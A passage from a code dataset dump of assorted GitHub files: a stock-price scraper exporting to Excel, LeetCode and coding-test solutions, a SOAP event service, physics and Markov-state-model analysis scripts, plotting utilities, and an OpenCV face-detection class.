[prom_day_min, convert_min_gm[0].text],\n [prom_day_max, convert_max_gm[0].text],\n [\" \", \" \"],\n [prom_now + str(\"Ford\"), convert_ford[0].text],\n [prom_day_min, convert_min_ford[0].text],\n [prom_day_max, convert_max_ford[0].text],\n [\" \", \" \"],\n [prom_now + str(\"Daimler\"), convert_daimler[0].text],\n [prom_day_min, convert_min_daimler[0].text],\n [prom_day_max, convert_max_daimler[0].text],\n ]\n\n today = date.today() # Текущая дата\n direction = 'Сarmakers_' # Название файла\n time_now = datetime.datetime.time(datetime.datetime.now()) # Текущее время\n new_data = pd.DataFrame(data).rename_axis(None, axis=1) # Создание датафрейма\n file_name = str(direction) + str(today) + '-' + str(time_flow) # Имя файла\n file_directory = file_name + '.xlsx' # Добавление Excel-расширения к файлу\n new_data.style.hide_index() # Индексы не будут показываться\n # Дальнейшая кастомизация через xlsxwriter\n writer = pd.ExcelWriter(file_directory, engine='xlsxwriter')\n new_data.to_excel(writer, sheet_name=str(sheet_name) + str(today), index=False)\n\n workbook = writer.book\n worksheet = writer.sheets[str(sheet_name) + str(today)]\n # Параметры данных в файле\n format_list = workbook.add_format({'border': 0, 'num_format': 'hh:mm:ss', 'size': 14, 'align': 'center'}) # Параметры формата чисел, размер шрифта, позиционирование по центру\n date_format = workbook.add_format({'num_format': 'mm.dd.yyyy'}) # Формат даты\n worksheet.write('A1', time_now, format_list) # Добавление в столбец А1 текущего времени\n worksheet.write('B1', today, date_format) # Добавление в столбец B1 текущей даты\n format = workbook.add_format({'align': 'left'})\n\n worksheet.set_landscape() # Ориентация по умолчанию\n # Параметры стобцов\n worksheet.set_column('A:A', 40, format)\n worksheet.set_column('B:B', 20, format)\n\n writer.save() # Сохранение получившегося файла\n print('\\n''Файл с названием ' + str(direction) + str(today) + '-' + str(time_flow) + ' сохранен') # Сообщение о сохранении\n\n\n# Функция с IT-компаниями\n@eel.expose\ndef start_Pandas_IT():\n\n progress_bar = 'Progress: '\n packing = 'Packing into file...'\n sheet_name = 'Данные рынка на '\n prom_now = \"Текущая стоимость акций \"\n prom_day_max = 'Дневной максимум '\n prom_day_min = 'Дневной минимум '\n\n check_AMD(convert_amd)\n print(progress_bar + '1/8')\n time.sleep(1)\n\n full_page = requests.get(Promotions_Intel, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_intel = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-251-last\"})\n convert_min_intel = soup.findAll(\"span\", {\"class\": \"inlineblock pid-251-low\"})\n convert_max_intel = soup.findAll(\"span\", {\"class\": \"inlineblock pid-251-high\"})\n print(progress_bar + '2/8')\n time.sleep(1)\n\n full_page = requests.get(Promotions_Apple, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_apple = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-6408-last\"})\n convert_min_apple = soup.findAll(\"span\", {\"class\": \"inlineblock pid-6408-low\"})\n convert_max_apple = soup.findAll(\"span\", {\"class\": \"inlineblock pid-6408-high\"})\n print(progress_bar + '3/8')\n time.sleep(1)\n\n full_page = requests.get(Promotions_IBM, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_ibm = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-8082-last\"})\n convert_min_ibm = soup.findAll(\"span\", {\"class\": \"inlineblock pid-8082-low\"})\n convert_max_ibm = soup.findAll(\"span\", {\"class\": \"inlineblock pid-8082-high\"})\n print(progress_bar + '4/8')\n time.sleep(1)\n\n full_page = requests.get(Promotions_Microsoft, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_microsoft = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-252-last\"})\n convert_min_microsoft = soup.findAll(\"span\", {\"class\": \"inlineblock pid-252-low\"})\n convert_max_microsoft = soup.findAll(\"span\", {\"class\": \"inlineblock pid-252-high\"})\n print(progress_bar + '5/8')\n time.sleep(1)\n\n full_page = requests.get(Promotions_Google, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_google = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-6369-last\"})\n convert_min_google = soup.findAll(\"span\", {\"class\": \"inlineblock pid-6369-low\"})\n convert_max_google = soup.findAll(\"span\", {\"class\": \"inlineblock pid-6369-high\"})\n print(progress_bar + '6/8')\n time.sleep(1)\n\n full_page = requests.get(Promotions_Facebook, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_facebook = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-26490-last\"})\n convert_min_facebook = soup.findAll(\"span\", {\"class\": \"inlineblock pid-26490-low\"})\n convert_max_facebook = soup.findAll(\"span\", {\"class\": \"inlineblock pid-26490-high\"})\n print(progress_bar + '7/8')\n time.sleep(1)\n\n full_page = requests.get(Promotions_Yandex, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_yandex = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-13999-last\"})\n convert_min_yandex = soup.findAll(\"span\", {\"class\": \"inlineblock pid-13999-low\"})\n convert_max_yandex = soup.findAll(\"span\", {\"class\": \"inlineblock pid-13999-high\"})\n print(progress_bar + '8/8')\n time.sleep(.5)\n\n hms = datetime.datetime.today()\n print(hms.hour, hms.minute, hms.second)\n time_flow = hms.hour, hms.minute, hms.second\n print(packing)\n\n data = [\n [prom_now + str(\"AMD\"), convert_amd[0].text],\n [prom_day_min, convert_min_amd[0].text],\n [prom_day_max, convert_max_amd[0].text],\n [\" \", \" \"],\n [prom_now + str(\"Intel\"), convert_intel[0].text],\n [prom_day_min, convert_min_intel[0].text],\n [prom_day_max, convert_max_intel[0].text],\n [\" \", \" \"],\n [prom_now + str(\"Apple\"), convert_apple[0].text],\n [prom_day_min, convert_min_apple[0].text],\n [prom_day_max, convert_max_apple[0].text],\n [\" \", \" \"],\n [prom_now + str(\"IBM\"), convert_ibm[0].text],\n [prom_day_min, convert_min_ibm[0].text],\n [prom_day_max, convert_max_ibm[0].text],\n [\" \", \" \"],\n [prom_now + str(\"Microsoft\"), convert_microsoft[0].text],\n [prom_day_min, convert_min_microsoft[0].text],\n [prom_day_max, convert_max_microsoft[0].text],\n [\" \", \" \"],\n [prom_now + str(\"Google\"), convert_google[0].text],\n [prom_day_min, convert_min_google[0].text],\n [prom_day_max, convert_max_google[0].text],\n [\" \", \" \"],\n [prom_now + str(\"Facebook\"), convert_facebook[0].text],\n [prom_day_min, convert_min_facebook[0].text],\n [prom_day_max, convert_max_facebook[0].text],\n [\" \", \" \"],\n [prom_now + str(\"Yandex\"), convert_yandex[0].text],\n [prom_day_min, convert_min_yandex[0].text],\n [prom_day_max, convert_max_yandex[0].text],\n ]\n\n today = date.today()\n time_now = datetime.datetime.time(datetime.datetime.now())\n direction = 'IT_'\n new_data = pd.DataFrame(data).rename_axis(None, axis=1)\n file_name = str(direction) + str(today) + '-' + str(time_flow)\n file_directory = file_name + '.xlsx'\n new_data.style.hide_index()\n writer = pd.ExcelWriter(file_directory, engine='xlsxwriter')\n new_data.to_excel(writer, sheet_name=str(sheet_name) + str(today), index=False)\n\n workbook = writer.book\n worksheet = writer.sheets[str(sheet_name) + str(today)]\n\n format_list = workbook.add_format({'border': 0, 'num_format': 'hh:mm:ss', 'size': 14, 'align': 'center'})\n date_format = workbook.add_format({'num_format': 'mm.dd.yyyy'})\n worksheet.write('A1', time_now, format_list)\n worksheet.write('B1', today, date_format)\n format = workbook.add_format({'align': 'left'})\n\n worksheet.set_landscape()\n worksheet.set_column('A:A', 40, format)\n worksheet.set_column('B:B', 20, format)\n\n writer.save()\n print('\\n''Файл с названием ' + str(direction) + str(today) + '-' + str(time_flow) + ' сохранен')\n\n\neel.start(\"PromDyn.html\", size=(1920, 1080)) # Параметры отображения содержимого в приложении","repo_name":"Berliner187/PromotionsDynamics_Python","sub_path":"GUI PromotionsDynamics/PromDyn.py","file_name":"PromDyn.py","file_ext":"py","file_size_in_byte":19447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22903908552","text":"# Adamın çözdüğü\n# Çözüm sayısı 0 | Hedef 5 çözüm\nclass Solution(object):\n def productExceptSelf(self, nums):\n res = [1] * len(nums)\n\n prefix = 1\n for i in range(len(nums)):\n res[i] = prefix\n prefix *= nums[i]\n # Soldaki rakamları çarpıyor prefix = 1 çünkü solunda rakam yok\n \n postfix = 1\n for i in range(len(nums)-1, -1, -1):\n res[i] *= postfix\n postfix *= nums[i]\n\n return res\n\n\n# Prefixde ilk olarak solundaki sayıları bulup çarpıyor\n# Postfixde ise sağındaki sayıların çarpımını buluyor ve bastırıyor.\n\nprint(Solution().productExceptSelf([1,2,3,4])) ","repo_name":"merthamit/Over-300-leetcode-solutions","sub_path":"leetcodes questions/238.py","file_name":"238.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1659859516","text":"def solution(fees, records):\n # 각 차량번호를 키, 값으로 총 주차시간, 출입 시간 저장\n # 만약 출입이면 출입시간에 저장\n # 퇴장이면 출입시간과 비교하여 총 주차시간 계산\n # 퇴장 후 다시 ''으로 변경\n parking_info = {}\n for record in records:\n # 시간, 차량번호, 입출입\n time, num, how = record.split()\n if how == 'IN':\n if num in parking_info:\n parking_info[num][1] = time\n else:\n parking_info[num] = [0, time]\n else:\n st_time = parking_info[num][1].split(':')\n time = time.split(':')\n # 시간별 분별 계산 보다, 00:00 기준 몇 분 후인지로 계산\n st = int(st_time[0]) * 60 + int(st_time[1])\n end = int(time[0]) * 60 + int(time[1])\n parking_time = end - st\n # 정보 갱신\n parking_info[num][0] += parking_time\n parking_info[num][1] = ''\n \n # 추가적으로 나가지 않은 차량에 대하여 확인\n # 나가지 않은 차량에 대한 출차 기준 시간은 동일\n end = 23 * 60 + 59\n for num in parking_info:\n if parking_info[num][1]:\n st_time = parking_info[num][1].split(':')\n st = int(st_time[0]) * 60 + int(st_time[1])\n parking_info[num][0] += end - st\n \n answer = []\n for num in sorted(parking_info.keys()):\n total_parking_time = parking_info[num][0]\n # 기본 요금 시간보다 적은지\n if total_parking_time <= fees[0]:\n answer.append(fees[1])\n else:\n fee = fees[1]\n total_parking_time -= fees[0]\n if total_parking_time % fees[2]:\n fee += (total_parking_time // fees[2] + 1) * fees[3]\n else:\n fee += (total_parking_time // fees[2]) * fees[3]\n answer.append(fee)\n return answer","repo_name":"mintropy/algorithm_pulzo","sub_path":"이영준/2021/09/0911카카오코테/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"3792036903","text":"'''\nCreated on Oct 17, 2012\n\nA basic implementation of the RMAS esb specification that uses mongodb as a backend\n\n@author: jasonmarshall\n'''\n\nimport logging\nfrom spyne.decorator import srpc\nfrom spyne.service import ServiceBase\nfrom spyne.model.primitive import Unicode, Boolean\nfrom spyne.model.complex import Iterable\nfrom spyne.util.simple import wsgi_soap_application\nfrom wsgiref.simple_server import make_server\nfrom datetime import datetime\nimport dateutil.parser\nfrom pymongo import Connection\nfrom rmasservicebus.EventValidator import validate_rmas_event\nfrom pymongo.errors import PyMongoError\n\ndatabase = None\nmessage_collection = None\n\nclass RMASService(ServiceBase):\n\n @srpc(Unicode, _returns=Boolean)\n def pushEvent(event):\n '''\n Push an event onto the RMAS bus queue\n @param message a valid RMAS event\n @return whether or not the message was succesfully pushed (most likely reason for False is invalid maessage)\n '''\n logging.info('attempting to push event to the queue: %s' % event)\n \n if validate_rmas_event(event):\n try:\n message = {'event':event,\n 'received':datetime.now()}\n message_collection.insert(message)\n logging.info(\"shoved message in the queue: %s\" % event)\n return True\n except Exception:\n logging.error(\"Failed to add the message to the queue!\")\n pass\n else:\n logging.error('Not a valid message: %s' % event)\n \n return False\n \n @srpc(Unicode, _returns=Iterable(Unicode))\n def getEvents(timestamp):\n '''\n Returns the RMAS events that have been received after the given timestamp\n @param timestamp the ISO-8601 timestamp, messages after this time will be delivered\n @return a list of RMAS events.\n '''\n \n logging.info('call to getEvents with timestamp: %s' % timestamp)\n \n try:\n datetime = dateutil.parser.parse(timestamp)\n except ValueError as e:\n logging.error('There was a Value Error parsing the timestamp %s: e' % (timestamp, e))\n\n \n #query the messages collection based on the datetime\n try:\n messages = [message['event'] for message in message_collection.find({\"received\": {\"$gt\": datetime}})]\n return messages\n except PyMongoError as e:\n logging.error('An error occurred whilst querying the database: %s'% e)\n\n return []\nif __name__=='__main__':\n \n connection = Connection()\n database = connection.rmas_messages\n message_collection = database.message_collection\n \n \n logging.basicConfig(level=logging.INFO)\n logging.getLogger('spyne.protocol.xml').setLevel(logging.INFO)\n\n logging.info(\"listening to http://127.0.0.1:7789\")\n logging.info(\"wsdl is at: http://localhost:7789/?wsdl\")\n\n wsgi_app = wsgi_soap_application([RMASService], 'spyne.examples.hello.soap')\n server = make_server('127.0.0.1', 7789, wsgi_app)\n server.serve_forever()\n \n \n \n \n \n\n","repo_name":"UoK-Psychology/RMAS-ServiceBus","sub_path":"rmasservicebus/esb.py","file_name":"esb.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23445074600","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport math \r\nimport cmath\r\nimport seaborn as sns\r\nimport scipy\r\nimport functools\r\nfrom scipy.linalg import expm\r\n\r\nT = 2\r\nJ1 = ((3*np.pi/4)/(np.sqrt(2)))*(2/T)\r\nJ2 = ((np.pi/2)/(np.sqrt(2)))*(2/T)\r\nJ3 = 0\r\nN = 20\r\n\r\ncm = plt.cm.get_cmap('plasma') #get colorbar\r\n\r\n#calculate the evolution operator\r\ndef Floquet():\r\n hopping_x1 = np.zeros((2*N,2*N))\r\n hopping_y1 = np.zeros((2*N,2*N))\r\n hopping_x2 = np.zeros((2*N,2*N))\r\n hopping_y2 = np.zeros((2*N,2*N))\r\n hopping_xy = np.zeros((2*N,2*N))\r\n hopping_yx = np.zeros((2*N,2*N))\r\n hopping_x3 = np.zeros((2*N,2*N),dtype=complex)\r\n\r\n for i in range(0,2*N-1,2):\r\n hopping_x1[i,i+1] = J1\r\n hopping_x1[i+1,i] = J1\r\n for i in range(1,2*N-1,2):\r\n hopping_x1[i,i+1] = 0\r\n hopping_x1[i+1,i] = 0\r\n for i in range(0,2*N-1,2):\r\n hopping_x3[i,i+1] = 0\r\n hopping_x3[i+1,i] = 0\r\n for i in range(1,2*N-1,2):\r\n hopping_x3[i,i+1] = 0\r\n hopping_x3[i+1,i] = 0\r\n for i in range(0,2*N-1,2):\r\n hopping_y1[i,i+1] = J1\r\n hopping_y1[i+1,i] = J1\r\n for i in range(1,2*N-1,2):\r\n hopping_y2[i,i+1] = 0\r\n hopping_y2[i+1,i] = 0\r\n for i in range(0,2*N-1,2):\r\n hopping_xy[i, i] = -1\r\n for i in range(1,2*N,2):\r\n hopping_xy[i, i] = 1\r\n for i in range(0,2*N-1,2):\r\n hopping_yx[i, i] = 1\r\n for i in range(1,2*N,2):\r\n hopping_yx[i, i] = -1\r\n h1 = np.kron(hopping_x1, np.eye(2*N))+np.kron(hopping_xy, hopping_y1)+np.kron(hopping_x3, hopping_yx)\r\n\r\n for i in range(0,2*N-1,2):\r\n hopping_x2[i,i+1] = 0\r\n hopping_x2[i+1,i] = 0\r\n for i in range(1,2*N-1,2):\r\n hopping_x2[i,i+1] = J2\r\n hopping_x2[i+1,i] = J2\r\n for i in range(0,2*N-1,2):\r\n hopping_y2[i,i+1] = 0\r\n hopping_y2[i+1,i] = 0\r\n for i in range(1,2*N-1,2):\r\n hopping_y2[i,i+1] = J2\r\n hopping_y2[i+1,i] = J2\r\n h2 = np.kron(hopping_x2, np.eye(2*N))+np.kron(hopping_xy, hopping_y2)\r\n UF = np.dot(expm(-1j*h1*T/4),np.dot(expm(-1j*h2*T/2),expm(-1j*h1*T/4)))\r\n return UF\r\n\r\ndef main():\r\n eigenvalue, eigenvector = np.linalg.eig(Floquet())\r\n # print(eigenvector)\r\n prob = np.dot(np.conjugate(eigenvector).T,eigenvector)\r\n for i in range(2*N*2*N):\r\n for j in range(2*N*2*N):\r\n if i != j:\r\n prob[i,j] = 0\r\n if i == j:\r\n prob[i,j] = prob[i,j]\r\n conv1 = np.zeros((2*N,2*N*2*N))\r\n for i in range(2*N):\r\n for j in range(2*N):\r\n conv1[i,i*2*N+j] = 1\r\n # print(conv1)\r\n conv2 = np.zeros((2*N*2*N,2*N))\r\n for i in range(2*N):\r\n for j in range(2*N):\r\n conv2[i*2*N+j,j] = 1\r\n # print(conv2)\r\n PROB = np.dot(np.dot(conv1,prob),conv2)\r\n for i in range(2*N):\r\n for j in range(2*N):\r\n PROB[i,j] = float(np.abs(PROB[i,j].real))\r\n sns.heatmap(np.abs(PROB))\r\n plt.show()\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"Hiloxik/FBOTP","sub_path":"Total Codes/probdensity.py","file_name":"probdensity.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"32125564890","text":"import argparse\nimport estimator\nimport numpy\n\ndef main():\n # Parser de la linea de comandos\n parser = argparse.ArgumentParser(description='Un script para obtener graficas de m, sigmay rho versus el error general e_k')\n parser.add_argument('--plot', help='Tipo de grafica a obtener (m: m vs error, sigma: sigma vs error, rho: rho vs error)', default='m')\n args = parser.parse_args()\n plot_type = args.plot\n\n # Variables\n error_results = []\n title = \"\"\n x_label = \"\"\n\n # Constantes\n y_label = \"Error General [e_k]\"\n tol = 1e-4\n\n # Caso Dimension vs Error\n if plot_type == \"m\":\n title = \"Dimension m vs Error General e_k\"\n x_label = \"Dimension [m]\"\n print(\"Generando la grafica: \" + title)\n rho = 0.5\n sigma = 1\n m_min = 2\n m_max = 100\n step = 1\n n_points = (m_max - m_min)/step\n for m in range(m_min, m_max, step):\n k, error = estimator.solucion_problA(m, rho, sigma, tol)\n error_results.append(error)\n estimator.get_plot(m_min, m_max, error_results, x_label, y_label, title, n_points)\n # Caso Sigma vs Error\n elif plot_type == \"sigma\":\n title = \"Desviacion Estandar sigma vs Error General e_k\"\n x_label = \"Desviacion Estandar [sigma]\"\n print(\"Generando la grafica: \" + title)\n rho = 0.5\n m = 25\n sigma_min = 0.1\n sigma_max = 5.0\n sigma = 0\n step = 1\n n_points = (sigma_max - sigma_min)*10/step\n for value in range(int(sigma_min * 10), int(sigma_max * 10), step):\n sigma += sigma_min\n k, error = estimator.solucion_problA(m, rho, sigma, tol)\n error_results.append(error)\n estimator.get_plot(sigma_min, sigma_max, error_results, x_label, y_label, title, n_points)\n # Caso Rho vs Error\n elif plot_type == \"rho\":\n title = \"Constante rho vs Error General e_k\"\n x_label = \"Constante [rho]\"\n print(\"Generando la grafica: \" + title)\n m = 50\n sigma = 1\n rho_min = 0.01\n rho_max = 0.99\n rho = 0\n step = 1\n n_points = (rho_max - rho_min)*100/step\n for value in range(int(rho_min * 100), int(rho_max * 100), step):\n rho += rho_min\n k, error = estimator.solucion_problA(m, rho, sigma, tol)\n error_results.append(error)\n estimator.get_plot(rho_min, rho_max, error_results, x_label, y_label, title, n_points)\n else:\n print(\"ERROR. Parametro invalido: \" + plot_type + \".\")\n print(\"Parametros validos: m | sigma | rho\")\n\n\nif __name__== \"__main__\":\n main()","repo_name":"jckruz777/Adaptive_Processing","sub_path":"tarea1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28390569655","text":"import matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nfrom matplotlib.font_manager import FontProperties\nimport numpy as np\n\ndef plot(data, result, training_set, categories, axis_labels, colors):\n xs = np.array([data[i][0] for i in range(len(data))])\n ys = np.array([data[i][1] for i in range(len(data))])\n cs = np.array([colors[r] for r in result])\n\n fig, ax = plt.subplots()\n\n mo = plt.scatter(xs, ys, c=cs, marker='o')\n\n xs = np.array([training_set[i][0] for i in range(len(training_set))])\n ys = np.array([training_set[i][1] for i in range(len(training_set))])\n cs = np.array([colors[r] for r in categories])\n\n mt = plt.scatter(xs, ys, c=cs, marker='^')\n\n ax.set_xlabel(axis_labels[0])\n ax.set_ylabel(axis_labels[1])\n\n mc = []\n for cat in colors:\n mc.append(mpatches.Patch(color=colors[cat]))\n\n handles = [mo, mt] + mc\n plt.legend(\n handles,\n [\"Classified data\", \"Training data\"] + [cat for cat in colors],\n scatterpoints=1,\n fontsize='small',\n bbox_to_anchor=(0., 1., 1., .024),\n loc=3,\n fancybox=False,\n ncol= 3,\n mode=\"expand\",\n borderaxespad=0.,\n edgecolor='black'\n )\n\n plt.show()\n plt.close(fig)\n\ndef plot_voronoi(voronoi, training_set, categories, axis_labels, colors, show_legend = True):\n from scipy.spatial import Voronoi, voronoi_plot_2d\n voronoi_plot_2d(voronoi, show_points=False, show_vertices=False)\n\n ys = np.array([training_set[i][1] for i in range(len(training_set))])\n xs = np.array([training_set[i][0] for i in range(len(training_set))])\n cs = np.array([colors[r] for r in categories])\n\n plt.scatter(xs, ys, c=cs)\n ax = plt.gca()\n\n ax.set_xlabel(axis_labels[0])\n ax.set_ylabel(axis_labels[1])\n\n if show_legend:\n mc = []\n for cat in colors:\n mc.append(mpatches.Patch(color=colors[cat]))\n\n handles = mc\n plt.legend(\n handles,\n [cat for cat in colors],\n scatterpoints=1,\n fontsize='small',\n bbox_to_anchor=(0., 1., 1., .024),\n loc=3,\n fancybox=False,\n ncol= 3,\n mode=\"expand\",\n borderaxespad=0.,\n edgecolor='black'\n )\n\n plt.show()\n","repo_name":"hausp/INE5443","sub_path":"t1/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"69820228533","text":"\nimport pyemma\n\nimport numpy as np\nimport pandas as pd\ntry:\n from sklearn.cross_validation import KFold\nexcept:\n from sklearn.model_selection import KFold\nfrom sklearn.pipeline import Pipeline\nfrom pyemma.coordinates.clustering import kmeans\nfrom pyemma.coordinates.transform import tica\nimport logging\n\ndef _dict_compose(dict1, dict2):\n \"\"\"\n Example\n -------\n >>> dict1 = {'a': 0, 'b': 1, 'c': 2}\n >>> dict2 = {0: 'A', 1: 'B'}\n >>> _dict_compose(dict1, dict2)\n {'a': 'A', 'b': 'b'}\n \"\"\"\n return {k: dict2.get(v) for k, v in dict1.items() if v in dict2}\n\nclass MaximumLikelihoodMSM(pyemma.msm.MaximumLikelihoodMSM):\n def __init__(self, lag: int, score_k=1) -> None:\n super().__init__(lag=lag, score_k=score_k)\n #self._estimate(dtrajs)\n \n def score_GMRQ(self, dtrajs: list) -> float:\n # eigenvectors from the model we're scoring, `self`\n V = self.eigenvectors_right()\n\n # Note: How do we deal with regularization parameters like prior_counts\n # here? I'm not sure. Should C and S be estimated using self's\n # regularization parameters?\n m2 = self.__class__(**self.get_params())\n m2.fit(dtrajs)\n\n if self.mapping_ != m2.mapping_:\n V = self._map_eigenvectors(V, m2.mapping_)\n # we need to map this model's eigenvectors\n # into the m2 space\n\n # How well do they diagonalize S and C, which are\n # computed from the new test data?\n S = np.diag(m2.pi)\n C = S.dot(m2.transition_matrix)\n\n try:\n gmrq = np.trace(V.T.dot(C.dot(V)).dot(np.linalg.inv(V.T.dot(S.dot(V)))))\n except np.linalg.LinAlgError:\n gmrq = np.nan\n\n return gmrq\n \n def _map_eigenvectors(self, V: np.array, other_mapping: dict) -> np.array:\n \"\"\"Mapping correspond\n\n Args:\n V (np.array): right eigvectors\n other_mapping (dict): mapping_ of new model\n\n Returns:\n np.array: [description]\n \"\"\"\n self_inverse_mapping = {v: k for k, v in self.mapping_.items()}\n transform_mapping = _dict_compose(self_inverse_mapping, other_mapping)\n source_indices, dest_indices = zip(*transform_mapping.items())\n\n #print(source_indices, dest_indices)\n mapped_V = np.zeros((len(other_mapping), V.shape[1]))\n mapped_V[dest_indices, :] = np.take(V, source_indices, axis=0)\n return mapped_V\n\n @property\n def mapping_(self) -> dict:\n \"\"\"[summary]\n\n Returns:\n dict: [description]\n \"\"\"\n mapping = {}\n for i, state in enumerate(self.active_set):\n mapping[state] = i\n return mapping\n\nclass TICA(tica.TICA):\n\n @property\n def mean(self):\n n_features = self.data[0].shape[0]\n n_observations_ = 0\n n_sequences_ = len(self.data)\n _sum_0_to_TminusTau = np.zeros(n_features)\n _sum_tau_to_T = np.zeros(n_features)\n for X in self.data:\n _sum_0_to_TminusTau += X[:-self.lag].sum(axis=0)\n n_observations_ += X.shape[0]\n _sum_tau_to_T += X[self.lag:].sum(axis=0)\n two_N = 2 * (n_observations_ - self.lag * n_sequences_)\n means = (_sum_0_to_TminusTau + _sum_tau_to_T) / float(two_N)\n return means\n\nclass MSMPipeline(Pipeline):\n def fit(self, trainData: list) -> None:\n output = trainData\n for name, obj in self.steps[:-1]:\n obj.fit(output)\n if name == 'cluster':\n output = obj.dtrajs\n else:\n output = obj.transform(output)\n _, obj = self.steps[-1]\n obj.fit(output)\n \n def score(self, testData: list) -> float:\n output = testData\n for name, obj in self.steps[:-1]:\n if name == 'cluster':\n output = [ np.concatenate(d) for d in obj.transform(output)]\n else:\n output = obj.transform(output)\n _, obj = self.steps[-1]\n return obj.score(output)\n\n\nclass GMRQValid(object):\n\n def __init__(self) -> None:\n super().__init__()\n\n def tICA_para_nICs(self, data, nICs=None, lag=1, kinetic_map=True, commute_map=False, n_folds=5):\n cv = KFold(n_splits=n_folds).split(data)\n dim = data[0].shape[1]\n if nICs is None:\n nICs = range(5, dim)\n results = []\n #tica = pyemma.coordinates.tica(lag=lag, kinetic_map=kinetic_map, commute_map=commute_map)\n model = MSMPipeline([\n ('tica', tica.TICA(lag=lag, kinetic_map=kinetic_map, commute_map=commute_map)),\n ('cluster', kmeans.KmeansClustering(fixed_seed=43, n_clusters=100)),\n ('msm', MaximumLikelihoodMSM(lag=1))\n ])\n for nIC in nICs:\n print(nIC)\n print(model)\n model.set_params(tica__dim=nIC)\n for foldIndex, (trainIndex, testIndex) in enumerate(cv):\n trainData = [data[i] for i in trainIndex]\n testData = [data[i] for i in testIndex]\n\n trainScore = 0\n testScore = 0\n #try:\n model.fit(trainData)\n trainScore = model.score(trainData)\n testScore = model.score(testData)\n #except:\n # logging.warn('Failed train the data for fold %d at nIC %d'%(foldIndex, nIC))\n results.append({\n 'train_score': trainScore,\n 'test_score': testScore,\n 'nIC': nIC,\n 'fold': foldIndex})\n results = pd.DataFrame(results)\n avgs = (results\n .groupby('nIC')\n .aggregate(np.median)\n .drop('fold', axis=1))\n print(results)\n print(avgs)\n #bestN = avgs['test_score'].argmax()\n #bestScore = avgs.loc[bestN, 'test_score']\n #print(bestN, \"gives the best score:\", bestScore)\n return results","repo_name":"Aunity/MDAKit","sub_path":"MDAKit/lib/msmtools/GMRQ.py","file_name":"GMRQ.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13730327983","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDescription:\nClass file for main facial detection\nOpens default webcam and detects faces\n'q' to exit\n\nRun the program like this:\n$ python Face.py\n\"\"\"\nimport cv2\nimport sys, os\n\nclass DetectClass:\n\t\n\t# Get classifier\n\tcascPath = \"haarcascade_frontalface_default.xml\"\t# sys.argv[1]\n\tfaceCascade = cv2.CascadeClassifier(cascPath)\n\n\t# Capture from Camera\n\tvideo_capture = cv2.VideoCapture(0)\n\t\n\tdef __init__(self, **kwargs):\n\t\tprint(\"Powering up!!\")\n\t\t\n\tdef message(self, string):\n\t\tprint(\"Checking for {0}\\n\".format(str(string)))\n\t\n\tdef detect(self):\n\t\twhile True:\n\t\t\t# Capture frame-by-frame\n\t\t\tret, frame = video_capture.read()#FFFFFF\n\n\t\t\tgray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n\t\t\tfaces = faceCascade.detectMultiScale(\n\t\t\t\tgray,\n\t\t\t\tscaleFactor=1.1,\n\t\t\t\tminNeighbors=5,\n\t\t\t\tminSize=(30, 30),\n\t\t\t\tflags=cv2.CASCADE_SCALE_IMAGE\n\t\t\t)\n\n\t\t\t# Draw a rectangle around the faces\n\t\t\tfor (x, y, w, h) in faces:\n\t\t\t\tcv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n\t\t\t# Display the resulting frame\n\t\t\tcv2.imshow('Video', frame)\n\n\t\t\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\t\t\tbreak\n\n\t\t# When everything is done, release the capture\n\t\tvideo_capture.release()\n\t\tcv2.destroyAllWindows()\n\t\tprint(\"Exit!!\")\n\t\t\n","repo_name":"ANTZ314/raspi","sub_path":"picam/opencv/CamDet1/faceDet1.py","file_name":"faceDet1.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"982504155","text":"# coding: utf8\n\nimport csv\n\nfrom System.Collections.Generic import List\n\nfrom Autodesk.Revit.DB import (\n FilteredElementCollector,\n UnitUtils,\n Document,\n MEPSize,\n Material,\n)\nfrom Autodesk.Revit.DB.Plumbing import PipeSegment, PipeScheduleType\n\nfrom pyrevit import script, forms, revit, HOST_APP\n\nif HOST_APP.is_older_than(2022):\n from 